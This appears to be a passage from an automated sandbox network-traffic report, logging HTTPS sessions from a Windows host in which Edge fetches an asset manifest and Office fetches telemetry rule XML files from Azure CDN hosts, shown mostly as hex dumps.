2024-11-25 23:25:42 UTC	16384	IN	Data Raw: 4a b0 09 cb 82 45 ac c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 Data Ascii: JEqb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1
2024-11-25 23:25:42 UTC	16384	IN	Data Raw: 2f 4d 35 19 b9 3f d5 c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 Data Ascii: /M5?Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|c
2024-11-25 23:25:42 UTC	16384	IN	Data Raw: 99 dc 5a 2e 69 cf 52 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 Data Ascii: Z.iRAHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`
2024-11-25 23:25:42 UTC	5254	IN	Data Raw: 29 50 5f 50 34 9a d3 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 Data Ascii: )P_P4*'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.6	49842	13.107.246.63	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:42 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:43 UTC	557	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:42 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: 595a4785-301e-006f-2f91-3fc0d3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232542Z-174f7845968nxc96hC1EWRspw80000000udg0000000002p2 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:43 UTC	15827	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c 87 07 e7 d4 da 16 34 27 65 eb d7 87 be 44 96 29 71 b2 3a d6 Data Ascii: [T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp4'eD)q:
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d d9 e8 78 24 ab 24 51 69 66 82 d7 44 e8 1d cf c8 e2 16 60 37 Data Ascii: kD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-x$$QifD`7
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 6e 30 91 49 05 4e 42 60 22 53 9e 67 6f 08 ac 30 cf 05 cd b5 Data Ascii: sg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqPn0INB`"Sgo0
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e 6f 2b 5e 74 f2 ea 6e 17 ed 6d 37 04 2d f5 5a 8e f8 43 2b c3 Data Ascii: MR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.Vo+^tnm7-ZC+
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 4e 60 6b e1 20 c2 ba 99 b8 6d 1e 51 d5 3c d5 da e1 b5 2c a1 Data Ascii: yfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\N`k mQ<,
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 45 bf 50 93 bc bc 7d c3 e9 75 22 5d 68 d9 1e 50 8f 5c 23 a1 Data Ascii: b.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>JcEP}u"]hP\#
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 c6 95 ea 57 bd 73 50 18 1d 54 fb 07 d5 da 41 bd 99 aa 6f 53 Data Ascii: u\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{OWsPTAoS
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 65 5d 3f 2f 1b ab ff 79 9a 2b b3 79 5d 62 4f 7c d5 ff 34 22 Data Ascii: Jj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@e]?/y+y]bO\|4"
2024-11-25 23:25:43 UTC	16384	IN	Data Raw: 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 cb e9 d4 75 42 52 43 29 e8 e5 94 bf 82 e4 a6 c8 40 37 67 5f Data Ascii: IdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>uBRC)@7g_

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.6	49846	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:42 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:42 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:42 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232542Z-174f7845968zgtf6hC1EWRqd8s0000000me00000000006x3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:42 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.6	49844	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:42 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:42 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:42 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: b24172ee-901e-0016-3789-3fefe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232542Z-174f7845968glpgnhC1EWR7uec0000000ung0000000004kb x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:42 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.6	49845	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:42 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:42 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:42 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 59a03737-a01e-00ab-1891-3f9106000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232542Z-174f7845968pf68xhC1EWRr4h80000000uw00000000003fa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:42 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 